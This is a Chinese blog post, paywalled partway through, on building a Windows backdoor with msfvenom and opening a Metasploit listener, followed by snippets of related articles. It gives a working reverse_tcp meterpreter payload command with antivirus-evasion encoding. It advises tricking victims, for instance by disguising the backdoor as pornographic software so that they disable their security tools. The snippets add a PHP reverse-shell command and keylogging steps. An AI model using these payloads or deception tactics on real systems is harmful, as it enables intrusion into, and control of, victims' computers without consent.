Msfvenom建立后门程序指令及开启监听

最新推荐文章于 2025-05-10 00:00:00 发布
原创 最新推荐文章于 2025-05-10 00:00:00 发布 · 1w 阅读 · 37 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何利用Metasploit框架进行客户端渗透测试。通过创建伪装的后门程序,结合社会工程学诱骗用户执行,然后在Kali Linux上设置监听,一旦受害者执行后门程序,即可获取其系统权限。文中还详细解释了Msfvenom创建后门程序的参数设置,并展示了开启监听和受害者触发后门的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、使用场景介绍

在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。

二、利用方式

1、利用Metasploit渗透测试框架中Msfvenom组件创建后门程序,将后门程序伪装成其他的正常小程序,比如起个具有高吸引力和高诱惑力的名字。
2、将该后门程序发布在相关的网站平台或者直接通过某种合理的方式发送至受害者的电脑中。
3、在kali本地端开启监听功能。
4、诱导用户点击并出发该后门程序,kali端即显示受害者上线,可获取受害者电脑权限,可执行恶意操作。

三、利用Msfvenom创建后门程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.85.176 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

  • 参数说明
    -a: 指定架构如x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。所以我们生成32位的后门,这样在32位和64位系统中都可以使用。
    –platform: 指定平台,这里选择
最低0.47元/天 解锁文章

200万优质内容无限畅学
【神兵利器】——190、MSF持续监听
Fly_鹏程万里
10-16 186
基本介绍。
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5346
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
MSF 生成不同的木马 msfvenom 框架命令
最新发布
浩策盾悟
05-10 1万+
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的Payload(有效载荷),如木马、后门等,主要用于测试系统安全性。它支持多种编码方式、文件格式和平台。针对Windows平台,msfvenom可以生成EXE、VBS、PowerShell、DLL、Python等格式的木马,并可通过编码避免检测。对于Linux平台,它支持生成ELF、Bash、Python、Perl等格式的木马。此外,msfvenom还支持跨平台Payload生成,如Python和Ruby脚本。其他实用技巧包括生成多平
KALI用MSF监听Windows7
weixin_60689826的博客
08-23 1197
利用MSF监听WIN7
渗透测试基础——MSF键盘监听
g90900的博客
11-24 405
⑥用 use 0 选择漏洞载荷,用 set payload 设置攻击载荷 命令为:set payload windows/x64/meterpreter/reverse_tcp,设置受害者还攻击者 ip.命令为:set rhost ip 受害者 set lhost ip 攻击者。②打开 win7 和 kali,在 cmd 终端用 ipconfig win7 IP,再kali 中用ifconfig查看IP,IP 就是系统的身份证。开始键盘监听,命令为:keyscan_start。⑧开始攻击,命令为:run。
metasploit---msfvenom
孤的博客
11-21 1612
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenommsfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
msfvenom建立后门通道的原理与操作方法详解
Msfvenom是Metasploit框架中的一个重要工具,用于生成恶意负载,包括但不限于后门程序、木马等。它可以生成各种格式的恶意负载,如可执行文件、脚本、shellcode等,用于渗透测试和安全评估中的攻击场景。 ## 1.2 ...
msfvenom后门木马伪装
12-29
### 使用 `msfvenom` 创建后门木马并进行文件伪装 #### 生成带有 Payload 的可执行文件 为了创建一个能够绕过基本检测机制的后门木马,可以使用 Metasploit Framework 中的工具 `msfvenom` 来生成恶意软件。通过...
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
利用 ssh 爆破 Linux 靶机,并使用 Msfvenom 工具生成后门,上传到靶机, 让 linux 靶机实现开机自启后门(一分钟执行一次后门程序)。并在kali 里面进 行多个会话连接,进行切换,验证上述操作是否成功
12-30
指令告诉msfvenom准备一段适用于ELF格式二进制文件形式的目标架构下的Meterpreter payload,在这里选择了reverse TCP的方式回连至攻击者控制端监听的服务上等待进一步指示[^2]。 为了让这个后门程序能够在每次...
钓鱼工具——msfvenom
weixin_59872639的博客
03-09 896
Msfvenom命令 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了。 (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-
msfvenom
weixin_39407564的博客
01-06 187
msfvenommsfpayload和msfencode的组合msfpayload:攻击载荷 负责攻击msfencode: 编码加密 负责绕过杀毒软件msfvenom是用来生成后门的软件,在目标机上执行后面,在本地监听上线。可以理解为远控木马。生成的远控木马在靶机上运行,攻击机启动监听,靶机成功运行之后,攻击机就可以拿到。
使用msf监听模块接收反弹shell
-
05-23 3538
msf
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom介绍
weixin_46483815的博客
05-11 3112
主要介绍msfvenom 和一些实验
使用msf攻击时开启端口监听的工具和命令
01-18 678
使用use 命令的时候需要打开这个东西输入,其他窗口输入无效。
Metasploit渗透测试之MSFvenom
YJ_12340的博客
10-10 2005
到目前为止,你应该已经对MSFvenom不陌生了,因为在之前的文章中已经介绍多次了。MSFvenom是用于生成有效攻击载荷和编码的工具。它由msfpayload和msfencode演变而来。并于2015年6月8日取代了这两者。在本文中,我们将更深入地研究可用的有效载荷,了解为什么编码器在规避安全检测时很有用,了解可用的可执行文件,转换输出格式等等。
MSF生成木马/Metasploit生成木马并执行监听和控制(精简版)
m0_62832001的博客
11-18 1968
这个时候我们Windows靶机直接运行文件就可以直接反弹到我们的攻击机上面然后返回看kali是否获取到了meterpreter,获取到了就说明成功了到这一步看到meterpreter就说明成功控制了,然后就可以执行一些相关的命令了(命令挺多的,网上找一下哦)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dreamsi_zh

您的鼓励是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值